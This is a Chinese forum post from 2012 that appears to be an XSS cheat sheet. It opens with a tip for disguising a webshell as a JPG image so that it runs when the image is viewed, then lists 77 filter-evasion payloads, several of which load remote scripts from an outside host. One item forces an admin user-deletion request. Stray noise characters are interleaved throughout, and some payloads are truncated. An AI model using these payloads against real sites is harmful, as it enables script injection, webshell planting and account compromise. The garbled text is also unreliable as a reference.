跨站图片shell
' F1 d! h. Q6 v& t# `+ _XSS跨站代码 <script>alert("")</script>
& c1 g; J* y% K# U4 H; o; W/ g! G$ N0 w+ F6 F# K' p6 T
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
, h* i3 z _0 k. d* G
/ t/ K7 ~% k" B* A1 |& J" C' Y( _' C' p- e* d1 P- m1 X
5 p. H* D# \. L6 }1)普通的XSS JavaScript注入% ^) b7 Q+ `, ]' F" J! }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% |4 u/ B! I+ a
: w: t4 V- c& O0 r$ [(2)IMG标签XSS使用JavaScript命令* G6 V: C0 G1 q B
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ g2 H! b7 `( G/ A
f8 u, i0 v% S% _(3)IMG标签无分号无引号
) U# O5 [) Y8 K2 S' R+ z2 @4 y( L<IMG SRC=javascript:alert(‘XSS’)>
; C, e, c% e5 b" _. @% S0 y* n- m7 N$ O% b, W5 l
(4)IMG标签大小写不敏感
5 o! J1 j; f& r) b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ Y/ ]0 |; H1 X
% I3 `: }1 F4 X8 A) }: q/ W" F(5)HTML编码(必须有分号)# H9 L* b( b5 ?( l
<IMG SRC=javascript:alert(“XSS”)>
& n5 W& a+ U0 ], w3 j$ k$ g) D3 f
" K4 a! j9 ]) c, [# o- R# T7 b(6)修正缺陷IMG标签
! A k- Z. s: F2 o( e<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 D5 X4 s) o! _( X8 z7 k
# X, \& h& G: K6 g" O(7)formCharCode标签(计算器)
* e3 B) {3 T; H: w+ G<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ r, q& c i: r1 U
( _9 R- I9 U6 o# }(8)UTF-8的Unicode编码(计算器)- f+ |, D5 A, N) Y
<IMG SRC=jav..省略..S')>! O* g( c3 |) M/ ~: X, J9 Z
7 E, k5 I, j5 m( R0 A(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 V7 R/ a, x( Q4 u" w& ?<IMG SRC=jav..省略..S')>$ U3 ]$ s, G4 q$ P/ r
$ E- s! ^4 Q) A1 ]
(10)十六进制编码也是没有分号(计算器)) O% |7 s( J& O/ P- r
<IMG SRC=java..省略..XSS')>
% q/ Y# y" S; @. f* r2 ^6 w7 H p1 q! ?. m, n$ c% t# N
(11)嵌入式标签,将Javascript分开
9 H5 p7 N- f: d0 `! I8 S4 D: x: ^# f<IMG SRC=”jav ascript:alert(‘XSS’);”>
* J9 U8 W; |9 q! v4 P* v& p; q* \; t
4 I( ]& l' `( E8 `7 Y6 s(12)嵌入式编码标签,将Javascript分开
! x$ t$ ^, b: |5 g' i<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 p+ Z) w$ M9 c9 ~5 p+ H, ~2 l/ ?9 u. i% c/ n! |
(13)嵌入式换行符& ?. l( q% N1 E' K3 V" j3 Z+ Y. L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 k3 `2 Y5 C+ c |$ C
* ]4 O1 \2 d0 I. S- S8 s c$ H& L(14)嵌入式回车# e/ L: E h# c8 T. w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; |6 j& @( \' ]. \$ f# i- J" h& A" S% C4 E/ n
(15)嵌入式多行注入JavaScript,这是XSS极端的例子& \) Z9 f3 C0 O. d% a
<IMG SRC=”javascript:alert(‘XSS‘)”>
* n, P- I" n! W9 c$ q0 [5 u' v5 f/ B0 N2 r" k* Z% s; o
(16)解决限制字符(要求同页面)
2 D/ s c- R# K, |! D# W% o<script>z=’document.’</script>' A' i1 P+ I, F/ N+ F1 o
<script>z=z+’write(“‘</script>* m8 B: N7 x: l7 \5 w0 T" y
<script>z=z+’<script’</script>! d0 Z; I+ t* W7 `! t1 P
<script>z=z+’ src=ht’</script>
5 |4 O) e3 R2 K$ J/ \<script>z=z+’tp://ww’</script>5 ^/ i: o7 l) s$ b& M: h5 g/ V
<script>z=z+’w.shell’</script>
# Z! m1 w' g K8 ^! n* F<script>z=z+’.net/1.’</script>8 ?; O8 \1 Z! [4 |4 m- i1 Q
<script>z=z+’js></sc’</script>4 o! H1 e U0 C& Y" ~
<script>z=z+’ript>”)’</script>/ b C6 o( f& l! m, a
<script>eval_r(z)</script>( h( a9 d |! T$ f
0 R& U) S' }$ r" `3 ](17)空字符
0 G( d/ l2 B- b3 K fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& B' J0 a( x/ a4 s2 \0 Y
7 P2 {1 O7 H% _: k(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! l& `6 L- j! U; ]6 V3 Fperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 E% h: E1 N" R( f+ e
7 O7 Y& V+ }* q O
(19)Spaces和meta前的IMG标签
6 m# S9 [2 C$ u8 ]- t8 @<IMG SRC=” javascript:alert(‘XSS’);”>
2 s" S; k( C2 y8 X7 i( Q" G: N& [, `1 }* Q, \8 ^8 J \
(20)Non-alpha-non-digit XSS/ h/ ^. Q8 F4 T
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* f5 K5 w8 |1 g
4 M$ G0 x: Q5 e6 T- X(21)Non-alpha-non-digit XSS to 2
+ n" G# d6 C# J4 Q+ u1 e7 i* P( i& o5 `<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 q4 t2 b. U$ k( Z$ Y
9 C, R; i8 L8 i4 P# u* I(22)Non-alpha-non-digit XSS to 3/ ~* }1 z. t. `; [
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ ~$ Y9 ^4 x; @ B' B) d
, K& H6 U" o) r6 Y(23)双开括号, O7 y" ~ p Y# N7 M. f
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# U) G9 Q) K1 u9 M1 n5 e
/ B7 m ~0 S* ](24)无结束脚本标记(仅火狐等浏览器)
4 E3 d j) R" K& `; p<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" ^# M0 d" E7 n k- Z5 J/ V& h4 e; R' T. \' Q
(25)无结束脚本标记2& s* t. ?9 D+ n5 p1 O
<SCRIPT SRC=//3w.org/XSS/xss.js>
/ ?5 p# A6 R2 E4 L' B! L g8 U% |0 L" M1 B+ C
(26)半开的HTML/JavaScript XSS* P) P5 Y; }9 o* v
<IMG SRC=”javascript:alert(‘XSS’)”
# U4 l8 F, Y2 @+ G
, v: {3 f7 i: Y) l0 E(27)双开角括号
/ P3 _7 B9 V" w5 y7 G" a: i* ]<iframe src=http://3w.org/XSS.html <
1 B! @% h# W0 r* c W& Z5 m! S
, W7 y6 ?5 T. `% m6 S& p$ G(28)无单引号 双引号 分号/ q# ~# K0 `8 @# e
<SCRIPT>a=/XSS/
' M0 R0 o& q1 o* q- T1 N0 ?* talert(a.source)</SCRIPT>" ^5 \7 X$ T8 @, v( v0 R
' O+ p+ O( C( B' y(29)换码过滤的JavaScript
1 [/ }$ J" R3 V( r; P\”;alert(‘XSS’);//
4 g: m Q" X$ k% Z4 h! K( T/ }" o, {; V
(30)结束Title标签- N" ]* w# X3 x% U& }
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: X$ K! v, F" b# O$ D, A) `4 S2 p
(31)Input Image$ l/ c. D6 X3 w* K) d
<INPUT SRC=”javascript:alert(‘XSS’);”>6 h& u# Q t. N/ V( _% T
0 I* F, h0 Z! D4 X% I( M8 @(32)BODY Image9 l8 |* T' X9 P) K
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 e: \7 v% x7 d) D; T' T: P' Z* O
5 y/ g* ^' X G& r* j) l# S+ _(33)BODY标签
! k2 P& _5 |% x+ v- ?# T5 v8 V<BODY(‘XSS’)>6 O* p y4 F) \; m+ S! @" O
: n# ~' [9 b% Y2 O6 k9 X$ h(34)IMG Dynsrc j, l5 ?; P, T
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 P/ F& c7 j. B
, Z. u& F7 Z8 m(35)IMG Lowsrc |$ C* U# ?7 w$ o5 u8 q' N N7 \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 w1 r3 @' z; T2 \# H
9 P9 c" L/ m/ L# n h. B(36)BGSOUND
, E3 t' K6 a3 m. {' d. y<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( @4 r- u/ n* J" Y6 Z Z. q1 r5 t% I
(37)STYLE sheet
1 x' P) C% {# d<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>$ g9 @% A" j [: g" A5 e
7 W( H% g- s$ y* W( q) w. c% w
(38)远程样式表) ^! _' P/ r e/ s& b7 q5 H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>$ P* |9 u; `+ f q
: w" g0 r3 r& r
(39)List-style-image(列表式)
( I" G, ]3 X* ?( w5 o1 B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# L$ K+ i. g* ]! H& i0 Y$ G+ y+ R) d9 b4 b; x
(40)IMG VBscript9 j+ o* o/ M0 g4 B) |
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS7 {3 [% V% X+ @) U) e! b3 m
6 D1 m/ O( C; M% |( D(41)META链接url
4 X9 K/ {6 W' E2 z" g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
0 n( h! b7 u6 q+ Y* I9 q# }, L5 A) d- p8 x% M5 m; O% o
(42)Iframe, L* M# h8 x# b+ {9 ]# A( J2 e; v
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 p* c: @$ m* O& L5 @(43)Frame
5 J4 Z# J3 R { E k6 U4 s- W<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- J, P# u7 @) O. D8 d+ W; _" j
: ?0 L4 D; P% t: Y(44)Table1 x2 g/ m5 X' o) u, k* u, }/ t5 n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ e/ j3 k, x f, V
' @/ [, D+ A, _+ F% I5 U9 z5 v(45)TD
4 P3 V( {5 n1 _5 d, u( e& F<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ p7 k2 }' U ~$ B# r" V6 s- |
+ j1 R) k; `9 s& F4 F8 u) }(46)DIV background-image
) s( T5 ]6 }1 h7 s; J<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># l8 k' y6 \, }
: G/ Z% p9 Z' J6 \) [3 q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
4 C$ S' E% x2 l, `. j<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>5 }" M; Q6 D1 i/ L. M* U5 N
( k( T* {& ]( v2 d' Y6 `' X(48)DIV expression
1 d& Q# b" W. T3 v( _<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 | Z4 k& D: n* S& m, m
8 `! e$ p3 r8 \) B; \" h6 \2 p
(49)STYLE属性分拆表达9 s. t+ v! p% p: j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>! S+ X5 M; n! M
0 q/ W8 W4 s2 K(50)匿名STYLE(组成:开角号和一个字母开头). R, f, O) @/ a$ V6 k6 e( }
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* I1 y7 ]3 y2 l/ ~
) P3 m, P3 G5 ~$ h! e4 b) `(51)STYLE background-image
' X, `) F2 |+ j<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( Z7 Q- ^" ~( ^& R: d" X N" {4 A! @7 z) D' \" R; q- @/ L" P2 T
(52)IMG STYLE方式
6 [- }3 g D. A& x8 s- ^exppression(alert(“XSS”))’> t. z( b3 Z/ |- {$ G
1 ~" g; T1 F* _8 x& g3 l# K(53)STYLE background
* c- Q1 `6 J$ [$ @<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& P* s& t" a1 r+ `+ I5 A6 U/ k- e# Q0 y9 n' N
(54)BASE
) I3 S$ j- K% o, Q5 w<BASE HREF=”javascript:alert(‘XSS’);//”>
- Q8 l2 e! V8 Z2 Y/ k: E( e7 ~) Q. [5 f% f: |+ V( [
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. D4 E/ G9 S2 m% K# W, n% w7 K
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 h x) ~1 S4 Q7 [- n/ }
2 E6 Y# a6 i: T- f/ a(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 u' J9 L. P1 l- X: wa=”get”; p3 @7 E+ U, d6 ~( |) p& U
b=”URL(\”";! k& l7 E4 D+ Y% {% b2 M
c=”javascript:”;
. T* Z- B2 [2 f$ u& qd=”alert(‘XSS’);\”)”;. Q/ @! O6 l! M0 ^* J9 u% e& [
eval_r(a+b+c+d); @; ~0 p D' C8 j) F
: w. X$ D8 n# a6 j! L9 D(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' Q' e& b5 u9 F6 ^" B<HTML xmlns:xss>
s; T M' Y& ~& C% }: a<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>) e- j2 H/ l0 ?- z
<xss:xss>XSS</xss:xss>1 b9 D4 R* D6 R2 i
</HTML>
, E0 P# `! I; i7 \
- R, Z& Z. U6 T6 Y# m: ?(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, E1 J# a7 i2 @0 m; e, G<SCRIPT SRC=””></SCRIPT>
, G. n% l) U# Z0 o5 P. Y
+ H1 w8 c9 Z4 J3 h5 Z$ p(59)IMG嵌入式命令,可执行任意命令
5 p; ^- n/ X# ~8 X- ~' |9 Q% [<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' O0 g0 u: H) E, ]8 i% t. @- x3 H8 q( Y1 c
(60)IMG嵌入式命令(a.jpg在同服务器)
) @$ a2 W* y8 I9 p: M) c4 k E; ^Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* g. u0 M) x- H* ?; W" z8 l6 J6 }9 h
(61)绕符号过滤6 T+ t/ f# ~ a, U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 P4 t* J E0 L5 i; z6 _8 \3 R) @
E! \- n+ a5 K- y3 X(62)1 h2 q& l E" D/ w+ W, v# F
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 n3 c, [! I( e6 r: s R, b
0 E, X9 U% u! ?+ L! B(63)
! t$ R: m" n1 g1 k<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 E, Y/ F* A& C) ?1 q- O
4 E3 }" b. C; c- X+ ~0 q& {
(64)
5 R. _8 O( E7 Y$ V4 ~" G) }0 p<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 p a' q/ q& k7 p' j: G' W* d: t
9 b4 F4 m5 O% }(65)' ]6 V( S4 w0 U' g; f
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> R3 u& b @) |% D7 H* W
( K3 N; ]$ K. ?6 |3 n/ x
(66), p/ A. |6 x( M9 v2 H
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" L& P- _, w2 d/ ?7 k/ E6 ~2 E- s3 @% |- t. j) I. t6 a* p
(67); I% g/ [3 ~% a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
& L2 D6 B2 H9 U( H/ f" I! a3 @, {+ r( w: C- E
(68)URL绕行
6 w7 P$ r5 U% ^+ o( ?* Q3 A<A HREF=”http://127.0.0.1/”>XSS</A>/ e7 l5 ^8 Q/ l# h1 `& y
4 J j- Q" N( q
(69)URL编码
+ L2 Y2 E9 a6 b7 R8 e* T<A HREF=”http://3w.org”>XSS</A>+ h/ U: e) u* g: q- `! M# g8 p
. R9 g7 X1 j" v- }/ ~
(70)IP十进制# Q9 n0 l+ H: _) ]2 X B
<A HREF=”http://3232235521″>XSS</A>
( j. t+ ?4 k) t$ E7 K! I! |5 G
9 R3 s' b1 t* a8 a1 Z(71)IP十六进制, N. ?6 N/ S! c2 n7 m' }# v: e3 f8 _
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ n4 x- c) R( x; u# \5 G B4 B/ ]. u
(72)IP八进制
1 p7 ]5 _. ]- [7 ~<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ u2 |% K5 } z1 {! a! y% x6 Z3 r. Q0 y" p/ {; Q8 B! g7 t* ]' k
(73)混合编码5 }# q1 ^4 i# d/ _% c6 l6 F
<A HREF=”h
- ?* f- K4 o. @2 u- V" ]8 jtt p://6 6.000146.0×7.147/”">XSS</A>
5 g& O4 Z( v: `, w9 h! A+ _$ B2 a' n, }' O9 m; n3 ?
(74)节省[http:]- t3 [/ p( F' \. s* w# a; _
<A HREF=”//www.google.com/”>XSS</A>
7 X4 @1 ~; u: A1 k+ C" ?, w( m) L
(75)节省[www]
7 h2 T6 r* G; Z, @/ T<A HREF=”http://google.com/”>XSS</A>' i$ A0 @/ m. x' E2 s, N( x
2 e& \; f E5 m% |
(76)绝对点绝对DNS7 O+ u8 f: U" |
<A HREF=”http://www.google.com./”>XSS</A>
1 P% [* \- l7 T, l
/ t9 u) d5 }/ X- B(77)javascript链接
0 C/ X1 H; s, [3 K5 b0 w9 h<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> I9 i/ r4 \6 L4 g) {8 K8 Z
|
发表于 2012-9-13 17:04:56
收藏
支持
反对